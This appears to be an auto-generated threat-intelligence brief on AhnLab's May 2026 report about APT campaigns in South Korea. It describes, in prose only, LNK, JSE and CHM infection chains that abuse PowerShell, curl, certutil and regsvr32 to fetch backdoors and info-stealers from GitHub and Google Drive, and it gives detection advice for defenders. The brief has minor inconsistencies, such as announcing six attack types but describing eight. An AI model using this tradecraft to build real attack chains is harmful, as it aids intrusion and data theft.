Answer Brief
AhnLab’s May 2026 report identifies spear phishing with malicious LNK files as the dominant APT infection vector in South Korea, detailing six attack types that abuse PowerShell, curl.exe, and legitimate Windows tools to deploy info-stealers, keyloggers, and backdoors via GitHub and Google Drive, while also noting CHM and JSE-based variants using regsvr32 and certutil for evasion.
Signal Timeline
A quick visual path for analysts before reading the full brief.
- 1
AhnLab monitored domestic APT attacks in South Korea
- 2
Report published by ASEC/AhnLab
Executive Summary: AhnLab’s May 2026 report identifies spear phishing with malicious LNK files as the dominant APT infection vector in South Korea, detailing six attack types that abuse PowerShell, curl.exe, and legitimate Windows tools to deploy info-stealers, keyloggers, and backdoors via GitHub and Google Drive, while also noting CHM and JSE-based variants using regsvr32 and certutil for evasion.
Why It Matters
AhnLab’s May 2026 report on domestic APT attack trends in South Korea provides a detailed technical breakdown of threat actor behavior observed through its telemetry infrastructure, emphasizing that the majority of detected APT activity originated from spear phishing campaigns leveraging LNK files as the initial infection vector. The report categorizes these into six distinct subtypes (Type A through F), each demonstrating a multi-stage attack chain where the LNK file acts as a launcher for scripts that download and execute further payloads. A consistent pattern across these chains is the abuse of legitimate Windows utilities—particularly PowerShell, curl.exe, and command-line tools—to retrieve additional malware from external sources, including GitHub repositories and Google Drive links. This use of trusted cloud platforms for payload hosting allows attackers to blend malicious traffic with legitimate user activity, reducing the likelihood of detection by conventional network or endpoint controls that may allow traffic to these domains.
The technical sophistication of these campaigns is evident in the layered execution techniques employed. Type A attacks, for example, use malicious PowerShell commands embedded in LNK files to contact external URLs, download additional files, and execute AutoIT-based malware while establishing persistence via Windows Task Scheduler. These chains perform reconnaissance (directory queries, file enumeration) and enable data exfiltration and file upload/download capabilities. Type B follows a similar pattern but relies on curl.exe to download malicious HTA files into the %TEMP% directory, which are then executed to load info-stealers, keyloggers, and backdoors directly into memory. The use of GitHub and Google Drive as distribution points in both types underscores a deliberate strategy to exploit the trust associated with these services in enterprise environments.
Technical Signal
Type C attacks further refine this approach by embedding Base64-encoded PowerShell scripts within LNK files that decode and execute in the %temp% folder, subsequently downloading decoy files and malicious scripts from GitHub to deploy XenoRAT—a remote access tool capable of system information theft and attacker control—while maintaining persistence through scheduled tasks. Type D and E introduce increased complexity: Type D uses LNK-based XML, JS, and PowerShell scripts to generate data and register tasks, eventually leading to the execution of malicious Python scripts after traversing BAT and compressed file layers, enabling remote command execution and file control via a backdoor. Type E enhances social engineering by disguising LNK files as resumes or documents, embedding decoy files and malicious PowerShell commands, then using VBS, BAT, and PowerShell scripts to register tasks and execute DLL side-loading to inject a backdoor into legitimate processes.
Type F demonstrates a particularly elaborate chain: attackers use LNK-embedded CMD and PowerShell commands to download additional files, copy curl.exe to %TEMP%, execute decoy PDF and BAT downloaders, install Python packages, and disguise pythonw.exe as a legitimate scheduled task before deploying a final Python backdoor that communicates with attacker-controlled C2 servers to execute commands and exfiltrate results. This multi-step process reflects a high degree of operational planning and evasion intent, leveraging fileless techniques and living-off-the-land binaries (LOLBins) to minimize forensic footprints.
Operational Impact
Beyond LNK-based vectors, the report identifies two additional attack types that exploit alternative file formats to achieve similar ends. Type G uses JSE (JScript.Encode) files to drop malicious DLLs into the %ProgramData% directory, which are then loaded into memory via regsvr32.exe—a legitimate Windows tool commonly abused for fileless execution and persistence. Once loaded, the DLL functions as a backdoor capable of stealing user information and executing further malicious actions. Type H leverages CHM (Compiled HTML Help) files, where embedded HTML scripts trigger PowerShell commands to generate and encode VBScript in Base64, which is then decoded using certutil.exe and executed via wscript.exe. This chain ultimately connects to external C2 servers to receive and execute additional scripts, demonstrating a full infection lifecycle using only native Windows components and obfuscation techniques.
AhnLab’s defensive response, as reflected in its product telemetry, generated a wide array of detection names including Backdoor/Win.Agent.C5882829, Backdoor/Win.Mudsdoor.R773004, Downloader/LNK.Generic.SC314654, Downloader/PS.Agent, Downloader/PowerShell.Agent, Downloader/VBS.Agent.SC314574, Infostealer/Win.Agent.C5882827, Trojan/BAT.Agent.SC315175, Trojan/JS.Agent.SC314582, Trojan/JSE.Agent, Trojan/LNK.Agent, Trojan/LNK.Loader.SC315176, Trojan/Python.Agent, Trojan/VBS.Loader, Trojan/XML.Task, Trojan/XML.Schedule, and Unwanted/Win.MeshCmd.R700828. The report explicitly notes that variants may evade detection due to obfuscation or packing, reinforcing the necessity of behavioral analytics and memory-based detection alongside signature-based controls. The ultimate objectives of these campaigns—consistent across types—include user data theft, system compromise, and the potential upload of additional malware, posing risks to both endpoint integrity and network security.
What To Watch
For security operations teams in East Asia and beyond, this report offers actionable intelligence on current TTPs in a high-risk environment. The reliance on LNK files—a frequently overlooked attack vector—combined with scripting and legitimate tool abuse, highlights how adversaries minimize dependence on traditional malware binaries to evade detection. Teams should prioritize monitoring for anomalous LNK execution, unexpected PowerShell or cmd.exe processes spawned from user-facing applications (e.g., Outlook, Word), and unauthorized script downloads from public cloud storage. Enabling detailed logging for Task Scheduler creation or modification, monitoring for regsvr32.exe or certutil.exe executing unusual scripts or DLLs, and reviewing proxy logs for connections to known malicious GitHub or Google Drive URLs can significantly improve early detection. Additionally, email security controls should be tuned to detect spear phishing attempts using document lures, and endpoint detection and response (EDR) solutions should be configured to flag script-based execution chains that begin with user interaction.
While the report is geographically focused on South Korea, the TTPs described are not regionally unique and have been observed in global threat landscapes. Organizations with operations, subsidiaries, or supply chain links in East Asia should treat this as first-hand situational awareness to validate internal telemetry against the described behaviors. Comparing endpoint alerts, mail gateway detections, identity anomalies, and network logs for similarities in execution patterns—such as LNK-triggered PowerShell chains, curl.exe downloads to %TEMP%, or regsvr32 loading unsigned DLLs—can help prioritize triage without asserting attribution. Sustained observation of these patterns across multiple regional sources would indicate a developing trend worthy of strategic monitoring.
Event Type: security
Importance: high
Affected Companies
- AhnLab
Affected Sectors
- cybersecurity
- technology
Key Numbers
- Primary attack vector: Spear Phishing
- Most used file type: LNK files
- Malware types observed: Backdoor, InfoStealer, Keylogger, AutoIt, Python, XenoRAT
- Payload delivery channels: GitHub, Google Drive
Timeline
- AhnLab monitored domestic APT attacks in South Korea
- Report published by ASEC/AhnLab
Frequently Asked Questions
What was the primary infection vector in South Korean APT attacks in May 2026 according to AhnLab?
The primary infection vector was spear phishing emails, often disguised as work-related documents, which delivered malicious LNK files to initiate multi-stage infection chains.
Which file types were most commonly used in the APT attack chains observed by AhnLab in May 2026?
LNK files were the most prevalent, often combined with CHM files and various scripts (PowerShell, VBS, BAT, JS, JSE) to download and execute payloads, establish persistence via Task Scheduler, and deploy backdoors or info-stealers.
How did attackers use legitimate tools and cloud services in the APT campaigns detailed in the AhnLab report?
Attackers abused legitimate Windows tools like curl.exe, certutil.exe, regsvr32.exe, and pythonw.exe, and hosted malicious payloads on trusted cloud services such as GitHub and Google Drive to evade detection and facilitate payload delivery.
What types of malware were delivered in the APT attack chains described in the AhnLab May 2026 report?
The attack chains delivered backdoors (e.g., XenoRAT, Muddoor), info-stealers, keyloggers, and downloaders, often using DLL side-loading, script-based execution, and process injection to maintain persistence and exfiltrate system information.
What mitigation steps does AhnLab recommend based on its May 2026 APT threat analysis?
AhnLab recommends verifying email senders, avoiding opening files from untrusted sources, reviewing insecure configurations, applying latest OS and browser patches, and maintaining updated V3 antivirus definitions to defend against evolving LNK-based APT tactics.